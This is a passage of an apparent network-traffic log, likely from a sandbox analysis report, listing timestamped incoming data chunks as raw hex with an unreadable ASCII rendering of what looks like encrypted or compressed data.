13 8d ad e2 8a 81 fd 87 62 ba 57 86 a8 43 b3 ef df dd fc Data Ascii: :qRF-\|<a&DyLy@~(>c<mG Wd=5=}Tb?9Z/GXF/BO(u3\|*S1D&HZNk.U\|:Jvu`oIX`0^22wY\^MSJ9hyY`@_VV{+_k!bWC
2021-11-22 13:07:59 UTC	48	IN	Data Raw: 29 04 c3 a0 43 6f ac d6 84 a5 a8 59 07 33 a7 f3 8c c6 08 9d 2c 2d 8d f9 33 0f 87 74 34 39 c5 6e 70 a2 98 c5 2a 79 83 81 c9 76 af 27 76 a9 be 8f 33 0d 4b 8b 3e fb b7 96 9f 3c 50 09 e2 16 63 df fa 20 3d 70 b3 3c 30 9d c4 c1 4c 15 36 12 0f dc cd 78 74 e2 55 7f 7f 99 4d 62 c4 cc 59 f6 80 62 c0 d5 05 42 56 55 ff 2f 71 c8 62 b0 16 ec 97 fd 7d 2c a3 e7 64 1a ac 6c 2d a2 5b 9d a7 f2 e1 ca 0e 43 75 f0 eb 7c 96 de 2a a6 7a 96 f8 ae 87 ef d0 fb 2e d1 df 23 76 8e d6 f1 63 f3 64 cd 09 53 34 c5 dc ff 4d f0 b8 95 45 68 c5 2f bf 2b e2 81 bc a6 65 db f6 75 82 e1 79 ea 47 19 b3 c5 35 14 a5 4e e2 a8 95 da 18 c8 b6 52 15 4f 50 42 1c 44 50 15 1c 8a 9c 9f 55 91 df 17 6b 3d 52 37 2b 5a eb b8 22 a9 25 4f 5b a7 27 94 b2 1c 7a de 5d db 85 17 de 6d ab 59 58 a1 84 82 37 50 b4 3d a9 Data Ascii: )CoY3,-3t49npyv'v3K><Pc =p<0L6xtUMbYbBVU/qb},dl-[Cu\|z.#vcdS4MEh/+euyG5NROPBDPUk=R7+Z"%O['z]mYX7P=
2021-11-22 13:07:59 UTC	49	IN	Data Raw: 6b 8e a9 0e 07 57 1f fa 3f f9 8f 2e 43 76 a0 53 42 d6 18 af d7 70 8d 5a c4 cb 22 42 bf e7 1f b9 f6 10 e8 f9 7c 68 2b 8c bc 2b 7b fd 30 de 6e 17 bb 1c f6 c0 e3 32 4a 53 b6 ce 4e 76 4b ef 4f 31 5a 19 48 26 ed 50 11 94 bf e8 32 a2 a6 5b 70 48 e4 4c 70 16 eb 75 4a 95 73 e8 13 db 61 a0 aa b6 d5 6f bd d3 7e 90 40 44 56 01 4a ae 86 2a 9d f6 55 99 f9 f1 50 a0 e4 29 18 2e ee f2 c2 31 84 a9 8d ad e8 82 87 5a a9 c0 c6 51 a0 bf 41 b3 e9 f5 84 66 45 a0 71 7a 95 e5 8e 45 7d e9 b0 99 b1 e4 70 1b c5 97 2e 17 5b 03 fd 1e f0 70 1f 47 0c e5 cf c3 f2 ae da bd 06 7e 0b ac 76 87 39 ef cf 38 9e e8 01 6c 5b 6a 22 ad 8e f4 8d ac 53 ed df 07 31 0c 5a c5 0b 0b 4f 8e 18 03 04 c6 23 e7 08 1b 71 34 1f a5 c3 0b 4d 2d b3 88 be d4 4f 25 11 17 69 24 60 f3 78 b2 d0 9d f1 4d f3 b8 76 33 94 Data Ascii: kW?.CvSBpZ"B\|h++{0n2JSNvKO1ZH&P2[pHLpuJsao~@DVJ*UP).1ZQAfEqzE}p.[pG~v98l[j"S1ZO#q4M-O%i$`xMv3
2021-11-22 13:07:59 UTC	50	IN	Data Raw: 5e 7c 13 8b b5 71 90 84 df d4 4d 43 d7 24 4e a3 b1 29 05 46 bc 77 cc 94 8e c7 07 cb 7d 28 32 d2 e8 91 14 86 0b 66 2c a8 a4 f6 70 a8 2a 83 77 e0 dc a0 e4 d7 3f fc 0a da 9a e3 3d 27 3e 7a 36 7d 6b 93 11 bc ee ff b5 ec ca d2 41 10 a9 a0 a2 82 7d f5 70 22 2f 42 45 a8 d9 73 3c e8 02 d6 01 39 0f 7c 9d da 09 05 59 03 95 f6 f8 8f 24 64 47 fa 6c 60 da 02 a9 c4 65 87 7e dc d8 a9 67 bd e7 75 d6 de 03 9b 45 6d 7c 30 95 ad 9b 79 fd 3c bd 34 86 bb 1a ed c7 f7 5f 0b 77 b4 ca 60 0e 6f ed 49 3a 42 25 a0 99 ee 56 3f 60 95 ea 38 8c 2b 5f 61 56 98 50 60 12 c9 56 52 bd bf c4 14 d7 47 e4 d6 ba c7 77 52 c1 48 05 40 5f 33 45 42 bf 84 de 4d f1 7f 9f d1 3a 79 a0 ee 03 d3 d3 ee 55 04 fc 8b a9 87 be ee 89 af 1f a8 63 b0 7b b8 bd 41 b5 fa f0 95 f8 6a df 66 72 46 8c 8c 45 7d e4 91 95 Data Ascii: ^\|qMC$N)Fw}(2f,p*w?='>z6}kA}p"/BEs<9\|Y$dGl`e~guEm\|0y<4_w`oI:B%V?`8+_aVP`VRGwRH@_3EBM:yUc{AjfrFE}
2021-11-22 13:07:59 UTC	51	IN	Data Raw: 0b 08 b6 8d ae ab 80 9a 3d 21 8b 27 4f 3f 96 7c 0a a4 cf 46 a0 b0 9e d2 4d 44 ee 08 ce 70 b8 3e 10 a0 b9 9e 31 06 2a 6d f8 fb b1 8f ae 80 a8 e7 15 d1 1a 47 f5 55 00 63 b9 2c 15 b9 5a ce 39 24 1b 5a 1f b8 b2 f7 75 e8 83 8c 55 ad 6f 7d 4b cd 53 ef a0 27 09 f7 07 48 5b 6e cb 3e 7d d3 b5 dd 38 c4 90 d1 6c 20 b2 ad 3f 3e ae 6e 2b b3 57 d5 ad 9d c7 ab 0f 45 64 40 c2 d0 95 c8 2c c9 50 94 f8 a8 81 fe dc 94 36 d6 df 29 a8 4f f2 d9 54 27 65 c7 1a 4b 1c fd dc e5 47 2e b9 97 7d 7a 13 3d b6 3a ea fe aa 98 1f 32 1a 8f 92 be 7a ea 41 6a 26 c1 2b e0 ac 4a 8e a3 97 d5 2a 3c 59 52 1f 6d d3 52 34 61 79 80 16 89 90 e7 8f 7f df 1d 0e 92 86 36 21 47 e5 18 f0 a8 2f 2a fa 72 26 9e ab 31 76 70 5e d1 8f 7b 53 7f ae 53 41 b5 9e a1 52 51 98 3e 88 f5 00 02 b8 b2 d9 62 6c 83 b3 99 14 Data Ascii: =!'O?\|FMDp>1mGUc,Z9$ZuUo}KS'H[n>}8l ?>n+WEd@,P6)OT'eKG.}z=:2zAj&+J<YRmR4ay6!G/*r&1vp^{SSARQ>bl
2021-11-22 13:07:59 UTC	52	IN	Data Raw: 55 47 e6 3e 61 d4 18 bc c4 64 9c 54 d5 d8 4c 7e 8d e4 19 96 df 12 e8 8e 6d 7c 2b ec 69 08 79 f7 3c cf 76 15 bb 10 cf 0c f1 21 23 61 db f3 48 19 67 c0 48 31 40 d0 7f 9b ee 50 c9 ef b0 c2 05 a4 b7 55 72 58 8d 5f 59 2e e1 67 58 60 bc e8 13 d1 32 05 74 b8 cd 5f 9b c6 60 96 57 30 04 56 4a a4 80 fe e3 43 7e 99 f3 fd 71 b3 ea 3d 0b df d6 9d 6b 30 8a b8 83 bc e5 1a 94 86 d6 5f ba 53 a4 97 98 b0 e9 f1 95 fa 6f fc 60 79 91 f2 e1 78 7d f2 8a 80 b7 84 62 1a c5 f7 3f 11 62 c6 ee 93 dd 1f ad 47 1f e9 aa d7 e4 b8 5d c3 16 68 1d 3a 74 8a 30 ff 7b f2 9b f1 11 9f f8 6d 38 b1 66 f7 8b b7 5e 62 c9 10 2b 32 1a d7 0d 10 36 a0 08 05 10 a4 ad f6 0e 1f 6b 2a 91 bc d4 1c c9 8c 38 43 90 cd 44 33 a6 17 68 2a 64 cd 04 a3 d6 84 ef 52 1c 8b 72 2c 9c 93 40 1f 33 e8 8f 0c c6 fe 20 d2 8c Data Ascii: UG>adTL~m\|+iy<v!#aHgH1@PUrX_Y.gX`2t_`W0VJC~q=k0_So`yx}b?bG]h:t0{m8f^b+26k8CD3hdRr,@3
2021-11-22 13:07:59 UTC	54	IN	Data Raw: 82 46 8a bc 98 ef 22 0d 45 62 e9 d5 f8 d1 df 2c c3 47 0e d0 43 82 fe da 81 20 f8 9b 28 a8 8b e5 43 7c f0 65 c7 1c 76 80 fd dc f5 28 08 ba 84 4b 54 20 2d b2 12 06 93 aa 9e 61 b9 09 8a a0 60 5f fb 47 7b 32 ec d9 1d ad 60 a9 bd bd 98 31 53 bc 45 85 4f 27 41 1c 48 6d 96 34 ce 97 f0 ea 86 45 72 22 b8 53 31 30 4b ac dd 20 a9 29 4f f8 a4 27 98 a7 08 54 1f 46 da 83 6e 4b 66 c4 94 50 b0 8b 90 67 ae 4b c8 5f f2 15 39 c1 96 d5 71 68 af ae 8d 02 7f de 78 d6 89 e0 61 c7 4e df 09 d8 77 f1 43 24 73 17 9d 29 27 64 42 11 d4 b2 a7 19 af 24 31 41 85 d2 d1 d8 52 4c a7 e1 60 7a 11 3a 4a 96 08 d2 5e c8 a1 2a e6 10 67 27 08 5e a7 ca 80 36 ab b8 79 0c b4 a5 72 4d a0 4d 41 8d 9b 86 52 89 5d b8 20 96 72 f8 ba d1 5e b6 39 b7 9f a8 e9 ab c1 11 3a 26 7a 3d aa 9a 46 fb 2b 3a 4d e4 7d Data Ascii: F"Eb,GC (C\|ev(KT -a`_G{2`1SEO'AHm4Er"S10K )O'TFnKfPgK_9qhxaNwC$s)'dB$1ARL`z:J^*g'^6yrMMAR] r^9:&z=F+:M}
2021-11-22 13:07:59 UTC	55	IN	Data Raw: f5 10 5e 47 3f 9b a4 9c a3 66 37 b8 1a aa 63 ba 4c 86 ac 53 b3 f8 e5 9b f5 b9 d9 4c 7f b0 03 91 4e 6e e0 80 82 a3 b3 54 e5 c4 d1 22 11 5b 14 82 8b da 70 15 59 39 f0 cc c5 f5 aa 59 be fe 68 31 29 76 8b 37 63 7b 29 9c f1 11 e6 62 42 38 bb 18 f3 cb aa 47 71 ce 1e 3e 09 d4 d4 1c 04 46 1c f7 04 36 d7 a9 e5 1e 1b 77 31 91 b4 d4 06 58 27 d1 98 94 d2 55 39 9b 9c 47 84 6e e5 e2 b5 fe ac fc 5b 65 bf 30 f4 9a 80 4a 11 24 ea 98 24 09 ec 3e 2a e2 8d 59 2c b2 6d 6e 98 92 16 5a 2c 90 b1 fd 63 cd fd 30 7c 97 35 dc 4a b0 b7 24 9c a8 4b 2b a7 17 66 ac 36 7b 5f 6b 66 6d 37 ea 5c 24 88 2e db c2 dc b8 da ee 06 9f 5e b9 5b 63 98 48 3c 1a 6b 08 d2 07 0b a7 70 a3 1d 34 64 58 c8 ab ea 29 a4 99 82 e8 e5 f7 1a da 63 b7 fd 3a bf 49 94 58 42 12 bd c0 b1 57 1f 3a 29 85 8f 98 4a 0a 0e Data Ascii: ^G?f7cLSLNnT"[pY9Yh1)v7c{)bB8Gq>F6w1X'U9Gn[e0J$$>*Y,mnZ,c0\|5J$K+f6{_kfm7\$.^[cH<kp4dX)c:IXBW:)J
2021-11-22 13:07:59 UTC	56	IN	Data Raw: d3 a6 2d 88 5f 1b 0d 5c 46 ca 88 75 4a f6 bd 42 5b a1 91 30 c3 99 b4 37 8b fc de 5c 5b ad d5 7b 65 92 a9 8d 18 90 cd 72 d2 88 89 59 3b 4e d5 df d8 74 f7 85 20 ad 9c bd 33 2a ea f3 41 52 4c 58 ec 2e 1d 61 78 b9 c3 c1 48 57 5a df 4a 70 e0 74 f8 62 ae 02 c5 8e 79 4c 2c cc 1d 5e 22 19 14 82 da 97 e2 31 ae 68 51 a5 b5 65 d1 3b 22 88 2d 9a 8c 4a 45 32 57 20 96 78 eb bc a2 7c b4 39 b7 8c b9 f8 6d af d8 3a ef 71 27 9b a1 57 ea 23 4f 65 e6 7c 15 90 ae 66 e8 c0 fa d6 49 6d d1 37 5f a0 f6 5e 04 46 bc 4e c5 be 82 c5 68 0b 12 02 3a 0c e0 b2 2d a0 64 7e 27 a4 86 df 60 bf f6 4e 67 f7 b2 9a f2 e9 26 2b e2 27 8b ec 02 a0 2e 73 21 5c 63 82 2f 19 7c c6 4a 32 d5 29 67 02 81 97 a8 91 65 8b e2 1a 2f 48 42 5e e1 75 16 e3 c0 d4 07 13 06 50 9d 87 37 05 57 19 95 f6 f9 ae 24 54 47 Data Ascii: -_\FuJB[07\[{erY;Nt 3*ARLX.axHWZJptbyL,^"1hQe;"-JE2W x\|9m:q'W#Oe\|fIm7_^FNh:-d~'`Ng&+'.s!\c/\|J2)ge/HB^uP7W$TG
2021-11-22 13:07:59 UTC	58	IN	Data Raw: 47 31 07 be b8 cb 4e 20 88 17 6a 13 5d e5 e4 a9 fb 89 8f e1 6f a9 7a 27 47 5d 4a 0e 39 e8 8f 0c 44 fe 20 d2 ee a8 76 c6 a2 63 77 b9 65 07 5a 3b aa f4 03 62 e7 f7 1c 68 bc d3 d9 62 95 9f c3 95 80 b2 00 fa 11 4e 8e 25 7d 5c 50 8a 77 24 fe 74 dc 99 33 23 eb ad b3 cb ec 3d 2a 56 91 4d 6a 86 5d 06 07 7e 1a cb 3c a8 a6 5c ac 1f 39 7a ea da b0 fe 3c 9e 86 97 fa fc c4 b9 db 4f b8 c9 5a b7 61 ba 45 5e 07 b9 e8 8e 45 00 21 c1 aa f0 f6 79 03 19 b7 f1 83 b8 89 8d 28 03 7f 20 20 1f 85 7a 24 92 c5 6e 7a dc b6 d6 22 68 fd 01 d9 7e c6 10 7d b8 be 8f 32 06 23 6d 19 f9 b1 83 85 24 7e 38 ee 0f 0a 39 d1 22 3b 65 bf 3c 30 da 53 c1 4c 15 c5 55 3b ff d2 f7 75 e8 4c 58 68 b0 47 4a 41 13 59 22 b8 71 9b c0 07 42 5a 55 f8 4d c7 d9 6b d5 35 c6 af fb 6c 2a 6c ee 0d 14 a9 46 2b b3 57 Data Ascii: G1N j]oz'G]J9D vcweZ;bhbN%}\Pw$t3#=VMj]~<\9z<OZaE^E!y( z$nz"h~}2#m$~89";e<0SLU;uLXhGJAY"qBZUMk5llF+W
2021-11-22 13:07:59 UTC	59	IN	Data Raw: 41 2c 38 97 5a 8b 49 ac 08 35 72 f8 b0 f9 4f b6 39 bb 8c af f8 6c e8 8d 3a ef 71 22 ba a7 af fa 2b 2a 5c e2 a6 04 5b a0 58 ff a8 f6 48 49 6b ca 39 5e 8d 70 79 06 4c 6c 40 ed cb 54 d2 6d 05 6c 2d 10 e6 e7 b4 36 3d 54 66 26 a5 a4 fd 71 a8 2a 51 66 e0 b5 5d f6 d1 2a d2 0c d1 a4 db ea 89 c2 72 18 c9 72 91 1b b0 5f 2b 9d db c0 0c 45 1d af 95 a2 84 7d d0 60 1a 2f 48 91 76 df 5f 16 e9 5f ca 01 39 0f 7a 9d c6 2b 05 57 19 ef f7 f9 8f 5e 55 47 e6 32 60 d4 18 b3 c4 64 9d 55 e5 df 4d 63 bc e7 19 a8 de 12 f9 fd 67 7e 2c f0 32 09 79 f7 29 ee 79 1d b9 0d 88 dc f3 21 2f 7c b2 e6 d4 19 6d e7 67 51 4a 0d 6a 97 9d 76 16 fb 9f f9 34 b5 b1 4b 49 74 8f 54 77 01 6c 60 52 bd b4 fa 1b c0 44 2f 0a dc c7 77 47 67 71 98 54 4b 11 9f 4b ae 86 e7 8a e6 57 b0 fd f0 7e b7 69 2c 18 d2 ef Data Ascii: A,8ZI5rO9l:q"+\[XHIk9^pyLl@Tml-6=Tf&qQf]*rr_+E}`/Hv__9z+W^UG2`dUMcg~,2y)y!/\|mgQJjv4KItTwl`RD/wGgqTKKW~i,
2021-11-22 13:07:59 UTC	60	IN	Data Raw: 77 c2 c2 9c d0 38 b6 9f bb 1f fb ec ee f3 d3 be c5 41 ac 4f 9d 6f c9 02 af c6 88 6b 02 2b d1 ac 46 84 5b 0b 31 2d e2 8a a3 93 98 2a 03 6a 20 20 1f bc 52 0e b5 c3 46 95 b2 9e de 0a f2 ec 08 c2 65 ae 32 57 2f bb 9e 3d 3f 0a 00 3f fd 99 60 95 2d 5c 30 76 0f 0c 5c e8 25 2a 65 91 03 3b b5 4d d6 64 31 1b 5a 14 c1 1b f6 64 e5 77 7c 42 88 41 5c 63 e3 59 fc a7 42 4d f6 58 6e 57 52 ff e3 da d9 6b df 2f e8 bf d5 6e 20 b4 fa 23 10 ae 6c 21 a5 79 cc de bf c5 c8 08 56 6c ed cb f8 c2 dc 2c cf 3f bc fa a8 87 ef d4 85 30 bf fb 2b a8 87 e2 d1 45 f7 4c c5 1b 5e 1a 92 fa fd 47 28 a9 8c 65 3c 17 3c b1 55 c0 92 aa 9e 09 35 01 e5 b2 4d 7a e0 9f 3f 44 e6 37 1e ab 75 b5 ba 9c f4 67 51 b6 54 70 4f ce 42 1a 5f 71 91 1b e5 b2 f2 e0 96 ce 14 15 bf 7b 35 20 4d 82 5f 05 ab 2f 26 c3 af Data Ascii: w8AOok+F[1-j RFe2W/=??`-\0v\%e;Md1Zdw\|BA\cYBMXnWRk/n #l!yVl,?0+EL^G(e<<U5Mz?D7ugQTpOB_q{5 M_/&
2021-11-22 13:07:59 UTC	61	IN	Data Raw: 45 22 7f 95 fd ae 43 8b 7a 18 2f 44 5c 7b c8 78 1e 86 36 d4 01 3f 1e 77 8c c2 44 21 55 19 93 e7 f4 88 4b 72 45 e6 26 71 d9 30 e0 c0 64 9a 21 ff da 4d 63 bb f6 14 b9 c6 13 e8 f5 b3 69 1f b7 e4 08 79 f7 25 bf 39 af bb 1a ed d9 da 19 25 76 be 10 71 08 7c fa 99 24 5a 1c 71 8b fc de a0 c4 4d 14 cd 5b a6 59 76 8a 98 52 60 10 f0 77 6c 36 4b 16 ec 0f 59 1c 5c 8f c7 77 49 d6 6f e3 fa 5f 39 5c 47 86 b4 f6 8c f8 a1 9b ff da 71 8a e4 2b 59 e6 ee 5f 6b 30 8a a9 48 ad e8 80 5a 83 a8 63 18 52 ae bf 54 b3 e9 f7 9e ff 47 d9 60 79 9b e5 dc 45 7d f2 07 92 b1 ac a8 1a c5 fd 3b 17 4a 1c f7 93 db 71 0c 76 1c e3 29 c5 e4 b8 c2 ac 00 78 0b 23 61 b9 eb f9 53 29 98 e0 11 ea b4 6d 14 be 04 e8 90 a4 43 71 df 07 35 e4 c7 f8 04 3e 77 10 09 03 11 c9 ac f0 0e 15 7e 3d 8a 4a c4 38 4f 32 Data Ascii: E"Cz/D\{x6?wD!UKrE&q0d!Mciy%9%vq\|$ZqM[YvR`wl6KY\wIo_9\Gq+Y_k0HZcRTG`yE};Jqv)x#aS)mCq5>w~=J8O2
2021-11-22 13:07:59 UTC	63	IN	Data Raw: 47 92 58 73 d7 dc 5e e7 8d d2 b3 f7 07 de 41 41 ef 1e a6 d9 6b df a2 ff 90 e6 4c b2 b2 ec 0b a2 bf 6b 35 ac 26 10 bc 9a d8 c1 2e e6 64 fc c3 4c 84 d9 33 c3 70 2d f8 a8 81 62 cd 93 29 db ff cf a8 81 f3 45 45 f4 7b cb 05 0d 80 ec db e0 4a 31 c2 18 5c 78 0c 32 97 af ea 90 aa 04 1f 23 16 85 b5 30 e6 fb 46 75 27 d2 a9 0f aa 79 ad bd 09 cd 37 4c a4 44 83 76 cb 5d 0f 58 e4 91 1b 95 82 e6 7c 81 d8 02 11 ac cf 26 26 52 92 10 dc a9 2f 20 4e b7 20 81 b6 0f ce 61 59 c4 9b 72 c6 7d ac 4c 49 90 01 aa ac 50 28 26 86 fb 1e 25 28 bc d2 6e 72 95 3e 8d 0f 15 f9 6e 4a 99 88 29 da 6e 55 d5 c9 7f 7a 84 30 64 18 b5 b8 2e ea f5 b2 bf 4b 47 f9 67 ad 05 6e ad f2 f1 2d 41 4b d4 c7 71 7d 04 10 74 32 19 d5 4b 34 b5 b0 dd 10 52 04 1e 83 82 cd 9f 10 8b 38 79 5a b4 39 63 00 be 68 57 b1 Data Ascii: GXs^AAkLk5&.dL3p-b)EE{J1\x2#0Fu'y7LDv]X\|&&R/ N aYr}LIP(&%(nr>nJ)nUz0d.KGgn-AKq}t2K4R8yZ9chW
2021-11-22 13:07:59 UTC	64	IN	Data Raw: 7a ea b1 e9 15 be fc 38 74 b2 65 66 5a dd 1e ac 40 5f 33 7e 12 aa 8c f0 e3 42 7e 99 f3 52 69 b9 fd 55 24 d2 ee 55 43 69 8e a9 8b c2 58 81 87 89 0a 72 a3 5f a6 ac 50 a5 fa e7 bc 21 45 d8 60 68 8a f4 9e df 70 fb b9 5f b3 ac 71 12 aa 4c 2f 17 40 0f fe 85 c8 62 27 f7 1d e3 de d4 f7 a9 54 36 13 6d 14 21 63 ee 91 f8 53 23 8b f4 64 91 4b 6c 32 a8 14 f4 8e 9f 1f 75 ce 07 42 a8 c7 d4 07 02 a7 13 1f fb 1b c1 ba de 55 00 78 24 ec 06 c4 14 4d 2f d1 98 ae 35 45 22 88 2e 33 3f 6c e3 8b 11 d7 82 f6 4f 91 a8 66 d2 9b e0 5b 0b 11 a4 8e 24 1e 91 92 d5 e3 ab 4a db a0 75 8f 90 e1 15 5f 15 dc ad 03 64 8e 56 19 61 9e 21 24 63 85 49 25 f6 df 8d 3e a5 11 4e fb 14 79 55 7e 71 7e 3e 75 49 35 9a 32 36 d9 e1 a9 dd c2 75 26 5f bf f3 7f 9c 4c 06 46 7e 1a cb b6 e4 bc 44 82 51 3a 73 c4 Data Ascii: z8tefZ@_3~B~RiU$UCiXr_P!E`hp_qL/@b'T6m!cS#dKl2uBUx$M/5E".3?lOf[$Ju_dVa!$cI%>NyU~q~>uI526u&_LF~DQ:s
2021-11-22 13:07:59 UTC	65	IN	Data Raw: 7d 82 06 27 85 3b 47 1f 67 cd 51 18 47 f6 37 0a bb bd e6 e9 1e 68 0a de a9 4d 24 2b 66 9d 21 27 b8 25 29 c3 ac bd b6 c8 1d 52 76 76 ff 83 64 50 ce ba 59 47 66 92 a0 bd 5a a5 29 b0 05 0c bd 03 bb e4 46 7f 90 a9 95 86 bd f4 7c 58 3f 98 ec d4 51 c6 d9 e2 60 f7 91 26 77 0e 84 33 b4 c2 9f 2a ae 4a 70 c2 71 31 1e cb a3 d9 c6 04 52 40 c5 57 77 ac 08 3d 73 a2 19 cd 65 cd d0 c3 cd 17 47 34 01 0e 97 d9 a1 22 b8 98 41 e8 b1 a5 72 16 80 5c 61 b7 89 93 43 8a 44 af 39 e5 82 f9 ba db 4d a7 28 a0 8b 80 68 6a c0 17 2c 62 7c 3d aa 8e 52 ef 3f 08 ee e4 7c 19 a9 e5 77 ee a5 52 eb 49 6b c1 35 5c b4 8b 6f 8a 79 ba 5f d5 be 20 c1 68 07 55 72 38 0c ec a3 ea 3c 20 66 26 a5 9f c0 66 bb 2d 4b 64 f5 8a a5 e7 d7 3d c7 12 ce 89 f1 66 54 3f 7a 36 46 62 80 00 ae a9 52 b1 ec c6 15 c2 32 Data Ascii: }';GgQG7hM$+f!'%)RvvdPYGfZ)F\|X?Q`&w3*Jpq1R@Ww=seG4"Ar\aCD9M(hj,b\|=R?\|wRIk5\oy_ hUr8< f&f-Kd=fT?z6FbR2
2021-11-22 13:07:59 UTC	66	IN	Data Raw: 44 88 41 25 52 cc 59 f6 94 90 b3 f7 07 53 46 59 fa e8 6e ce 7a cb 28 dd c6 ea 7a 38 64 ff 1c 15 e7 7d 3b a0 70 9d 8a 8c e0 a7 29 47 64 fa d2 de 82 53 2b c9 50 95 eb 8a 90 dc ca 85 21 5c e0 29 a8 80 51 c8 76 e7 4c 68 1a 5e 16 d5 86 ff 47 24 90 6e 4c 7f 19 14 63 3b ea 9a 82 bc 0e 24 03 e5 82 4e 7a ec 50 7d 20 12 26 09 bc 68 ab 26 92 dc 30 52 a5 74 0e 41 da 53 0b c2 47 80 1c 8b 34 e1 c6 84 f7 b2 04 ba 59 28 01 c1 bb 30 23 a8 39 08 6a a6 27 94 8d 36 43 7e 49 56 84 64 5a 6d b8 70 41 93 97 bb bb dc 8b 37 81 e5 a6 22 97 b9 fd de 69 83 a8 83 77 86 da 78 d6 89 99 1e 35 4f d5 df f3 23 19 6a c8 6c 15 86 29 39 f9 e3 16 2b 4e 58 e6 60 3e 3c 27 b6 d2 d7 bd 58 4a d4 51 4d 6b 0a 3e 4a fe 0c d2 52 79 ba 2d cc 1d 74 e3 08 1f 93 db 96 2b a2 6e 6a 42 a5 b1 64 34 f0 5c 57 35 Data Ascii: DA%RYSFYnz(z8d};p)GdS+P!\)QvLh^G$nLc;$NzP} &h&0RtASG4Y(0#9j'6C~IVdZmpA7"iwx5O#jl)9+NX`><'XJQMk>JRy-t+njBd4\W5
2021-11-22 13:07:59 UTC	67	IN	Data Raw: 45 bc b5 e3 1b c7 5d 35 7c 36 70 7f cd 72 48 87 41 5f 33 42 46 bf 80 fa 98 e1 73 90 77 47 70 2e 53 1b dc db 60 e8 7c ea 9d 7f 00 92 e8 80 86 90 ad 74 b3 dd 19 a8 9b a0 f8 e4 89 d4 5f c9 65 68 96 f2 54 4c 6c ff 14 9b a0 a1 66 c1 51 9c b0 06 47 0b 3b 80 d6 61 12 57 0e d2 3c d4 e1 36 f1 bb da 7e cb bd 58 81 21 f8 40 2f 8e e0 12 7e fd 74 e2 a8 00 f6 85 9c 17 60 cb 10 23 8e d7 d0 1c 18 cd c8 1f 2a 02 c1 b9 e7 00 15 7d 33 8d 20 e5 eb 47 3b 2f 4f a9 cf 55 3d 19 dc f1 10 7c f4 e2 b2 d8 93 f9 4a 61 3d 61 28 8b 8e de d4 a7 ff 9b 22 09 f0 b4 fc 09 a0 5e 2f 89 b7 70 91 8b 2c 7e 3d 82 a3 09 73 ef f3 ce 72 9a 24 d4 73 81 86 8c 48 8f 91 00 90 11 4e 82 25 74 7d 40 62 74 2e 26 5c 33 b0 33 64 df f0 b3 cb ea 2e 22 59 b9 51 6e 96 59 2e 1a 6c 18 cd 14 fa a6 5c aa 16 3e 73 c3 Data Ascii: E]5\|6prHA_3BFswGp.S`\|t_ehTLlfQG;aW<6~X!@/~t`#*}3 G;/OU=\|Ja=a("^/p,~=sr$sHN%t}@bt.&\33d."YQnY.l\>s
2021-11-22 13:07:59 UTC	68	IN	Data Raw: ab 95 d8 be e4 60 50 91 d0 e4 55 1d 4e 72 91 1a 9b 9e 9f c2 91 df 17 17 be 20 11 20 4d 8e 23 2a b8 26 37 bd 8f 26 9e ab 08 5b 67 31 f1 82 64 50 73 b3 de 7b b0 81 ab bf 5a aa ba aa e4 04 32 a7 a8 dc 60 63 8a 2c 2b 20 2a e4 78 dc 99 8b 20 d6 44 dc 5b 7e 61 ce 82 36 7b 0c 84 3c 30 fb f0 38 b0 64 4f e7 71 3b 05 60 a3 d8 be f5 40 4b de 4a 69 6b 1e 5e 4a af 08 d8 45 1f cc 07 cd 17 47 2c 0f 1c 85 c9 0e 83 c4 94 78 5a be b6 75 2f b2 4c 41 27 8b 81 3d 89 5c b8 2a 9a 7a f2 64 c4 7b 9e 0e b1 9f a2 fa 63 e8 3f 38 ef 7d 37 82 b7 46 fb 21 fe 4d e2 56 13 81 fe 6b ee af de d4 49 6b c0 26 4e a5 ae 79 06 46 8d 5e d4 96 9b c1 68 0d 67 28 38 0d fd 84 3a b1 6a 66 26 a4 1c ce 70 b9 53 3c 76 e6 a8 86 ec b8 ce d5 1d d2 89 e3 17 5e 5b 7b 30 5f 61 94 00 bc 90 3c a3 fd c5 82 f8 5a Data Ascii: `PUNr M#&7&[g1dPs{Z2`c,+ x D[~a6{<08dOq;`@KJik^JEG,xZu/LA'=\*zd{c?8}7F!MVkIk&NyF^hg(8:jf&pS<v^[{0_a<Z
2021-11-22 13:07:59 UTC	70	IN	Data Raw: c0 42 6c 1a be 12 e5 1e b7 45 60 bd bb 2d 1a cc de 7e ed 58 12 03 09 12 f8 c2 f2 0e 02 50 5c 87 b4 c3 3c d0 38 2f 9f cb 37 45 33 87 69 92 3a 6c ef ec 8b a9 86 fc 5d 47 29 74 2c 9c a8 dd 0d 39 ff f9 d8 19 fe 2a bb 1e a0 5e 2f a9 4b 0c 95 81 02 72 bc 86 a9 05 4a 76 e7 18 67 e7 c9 db 62 99 d8 d9 97 80 be 20 8f 6e 4a 88 30 53 d7 7c 62 72 0c 6f 5f 35 9c 40 d9 c2 f0 b9 a4 17 2f 22 55 b1 79 ed 82 5b 28 32 fe 1e cd 12 dd 31 5f aa 0a 4d 8f c3 c4 be 91 c7 b7 99 99 f2 d2 6f e0 db 49 96 41 4f bf 4f bc c2 5a 01 a9 b3 5c 44 00 21 b8 79 a2 85 51 09 31 37 e6 8a af a8 18 28 2b 9c 0b a7 1d 94 7a 7f 49 c4 6e 7a dc 63 d5 22 64 e4 20 40 72 a9 32 57 31 bc 9e 3d 3f b3 01 3f fd c2 79 95 2d 5c 77 17 0e 0c 5c ed 28 54 9d b8 2d 33 a2 91 d3 5e 0c 1f 62 39 d6 e5 f7 0b 1d 5e 52 4a 80 Data Ascii: BlE`-~XP\<8/7E3i:l]G)t,9*^/KrJvgb nJ0S\|bro_5@/"Uy[(21_MoIAOOZ\D!yQ17(+zInzc"d @r2W1=??y-\w\(T-3^b9^RJ
